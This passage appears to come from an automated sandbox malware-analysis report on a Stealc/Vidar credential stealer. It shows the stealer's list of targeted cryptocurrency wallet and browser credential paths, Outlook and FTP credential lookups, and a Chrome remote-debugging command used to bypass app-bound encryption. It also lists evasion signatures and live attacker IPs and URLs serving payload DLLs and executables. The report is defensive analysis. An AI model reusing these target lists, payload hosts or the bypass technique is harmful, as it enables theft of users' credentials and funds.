Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.2619339487.000000000067C000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Yara detected Stealc
Source: Yara match File source: 0000001D.00000002.3017859957.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3093978577.00000000005F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2976420926.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2874044959.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.3053437488.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3016848121.00000000005F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3094796057.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.2831544731.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2134993992.0000000004F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2625469567.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2619339487.00000000005B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2871777456.00000000005F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 80b5f835af.exe PID: 9148, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 80b5f835af.exe PID: 3004, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 80b5f835af.exe PID: 8412, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CCC0C40 sqlite3_bind_zeroblob, 0_2_6CCC0C40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CCC0D60 sqlite3_bind_parameter_name, 0_2_6CCC0D60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBE8EA0 sqlite3_clear_bindings, 0_2_6CBE8EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CCC0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 0_2_6CCC0B40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBE6410 bind,WSAGetLastError, 0_2_6CBE6410
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554385 Sample: file.exe Startdate: 12/11/2024 Architecture: WINDOWS Score: 100 70 sb.scorecardresearch.com 2->70 72 r.msftstatic.com 2->72 74 5 other IPs or domains 2->74 96 Suricata IDS alerts for network traffic 2->96 98 Found malware configuration 2->98 100 Antivirus detection for URL or domain 2->100 102 10 other signatures 2->102 9 file.exe 37 2->9         started        14 skotes.exe 2->14         started        16 skotes.exe 2->16         started        18 5 other processes 2->18 signatures3 process4 dnsIp5 76 185.215.113.206, 49709, 49778, 51556 WHOLESALECONNECTIONSNL Portugal 9->76 78 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 9->78 80 127.0.0.1 unknown unknown 9->80 56 C:\Users\user\DocumentsCBAKJEHDBG.exe, PE32 9->56 dropped 58 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 9->58 dropped 60 C:\Users\user\AppData\...\softokn3[1].dll, PE32 9->60 dropped 62 11 other files (none is malicious) 9->62 dropped 136 Detected unpacking (changes PE section rights) 9->136 138 Attempt to bypass Chrome Application-Bound Encryption 9->138 140 Drops PE files to the document folder of the user 9->140 152 9 other signatures 9->152 20 cmd.exe 9->20         started        22 msedge.exe 2 10 9->22         started        25 chrome.exe 9->25         started        82 185.215.113.43 WHOLESALECONNECTIONSNL Portugal 14->82 142 Creates multiple autostart registry keys 14->142 144 Hides threads from debuggers 14->144 146 Tries to detect sandboxes / dynamic malware analysis system (registry check) 14->146 28 e8cb2646d2.exe 14->28         started        30 80b5f835af.exe 14->30         started        32 skotes.exe 14->32         started        148 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->148 84 192.168.2.23 unknown unknown 18->84 150 Maps a DLL or memory area into another process 18->150 34 msedge.exe 18->34         started        36 identity_helper.exe 18->36         started        38 5 other processes 18->38 file6 signatures7 process8 dnsIp9 40 DocumentsCBAKJEHDBG.exe 20->40         started        44 conhost.exe 20->44         started        112 Monitors registry run keys for changes 22->112 46 msedge.exe 22->46         started        86 192.168.2.6, 443, 49705, 49707 unknown unknown 25->86 88 239.255.255.250 unknown Reserved 25->88 48 chrome.exe 25->48         started        114 Detected unpacking (changes PE section rights) 28->114 116 Tries to detect sandboxes and other dynamic analysis tools (window names) 28->116 118 Modifies windows update settings 28->118 126 4 other signatures 28->126 120 Tries to evade debugger and weak emulator (self modifying code) 30->120 122 Hides threads from debuggers 30->122 124 Tries to detect sandboxes / dynamic malware analysis system (registry check) 30->124 90 s-part-0017.t-0009.t-msedge.net 13.107.246.45, 443, 49711, 49712 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 34->90 92 13.107.246.57, 443, 51614, 51635 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 34->92 94 15 other IPs or domains 34->94 signatures10 process11 dnsIp12 54 C:\Users\user\AppData\Local\...\skotes.exe, PE32 40->54 dropped 128 Detected unpacking (changes PE section rights) 40->128 130 Tries to evade debugger and weak emulator (self modifying code) 40->130 132 Tries to detect virtualization through RDTSC time measurements 40->132 134 3 other signatures 40->134 51 skotes.exe 40->51         started        64 play.google.com 142.250.185.206, 443, 49780 GOOGLEUS United States 48->64 66 www.google.com 142.250.186.132, 443, 49720, 49721 GOOGLEUS United States 48->66 68 2 other IPs or domains 48->68 file13 signatures14 process15 signatures16 104 Detected unpacking (changes PE section rights) 51->104 106 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 51->106 108 Tries to evade debugger and weak emulator (self modifying code) 51->108 110 3 other signatures 51->110
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
13.107.246.45
 s-part-0017.t-0009.t-msedge.net United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
23.221.22.200
 unknown United States
20940 AKAMAI-ASN1EU false
162.159.61.3
 unknown United States
13335 CLOUDFLARENETUS false
142.250.186.33
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
239.255.255.250
 unknown Reserved
unknown unknown false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
142.250.185.206
 play.google.com United States
15169 GOOGLEUS false
172.217.18.14
 plus.l.google.com United States
15169 GOOGLEUS false
152.195.19.97
 unknown United States
15133 EDGECASTUS false
142.250.186.132
 www.google.com United States
15169 GOOGLEUS false
172.64.41.3
 chrome.cloudflare-dns.com United States
13335 CLOUDFLARENETUS false
13.107.246.57
 unknown United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
18.244.18.122
 sb.scorecardresearch.com United States
16509 AMAZON-02US false
94.245.104.56
 ssl.bingadsedgeextension-prod-europe.azurewebsites.net United Kingdom
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false

Private

IP
192.168.2.6
127.0.0.1
192.168.2.23

Contacted Domains

Name IP Active
chrome.cloudflare-dns.com 172.64.41.3 true
plus.l.google.com 172.217.18.14 true
play.google.com 142.250.185.206 true
ssl.bingadsedgeextension-prod-europe.azurewebsites.net 94.245.104.56 true
sb.scorecardresearch.com 18.244.18.122 true
s-part-0017.t-0009.t-msedge.net 13.107.246.45 true
www.google.com 142.250.186.132 true
googlehosted.l.googleusercontent.com 142.250.186.33 true
assets.msn.com unknown unknown
r.msftstatic.com unknown unknown
c.msn.com unknown unknown
ntp.msn.com unknown unknown
clients2.googleusercontent.com unknown unknown
bzib.nelreports.net unknown unknown
206.23.85.13.in-addr.arpa unknown unknown
apis.google.com unknown unknown
api.msn.com unknown unknown
browser.events.data.msn.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/68b591d6548ec281/softokn3.dll false
    		high
    http://185.215.113.206/ false
      		high
      http://185.215.113.43/Zu7JuNko/index.php false
        		high
        http://185.215.113.206/68b591d6548ec281/freebl3.dll false
          		high
          http://185.215.113.206/68b591d6548ec281/nss3.dll false
            		high
            https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 false
              		high
              https://play.google.com/log?format=json&hasfast=true false
                		high
                https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 false
                  		high
                  https://sb.scorecardresearch.com/b2?rn=1731414942256&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=18953A12EB3F612E20052F27EA3760E0&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null false
                    		high
                    https://clients2.googleusercontent.com/crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx false
                      		high
                      http://185.215.113.206/68b591d6548ec281/vcruntime140.dll false
                        		high
                        https://assets2.msn.com/bundles/v1/edgeChromium/latest/common.0baf1f64c7e61454b12f.js false
                          		high
                          http://185.215.113.16/mine/random.exe false
                            		high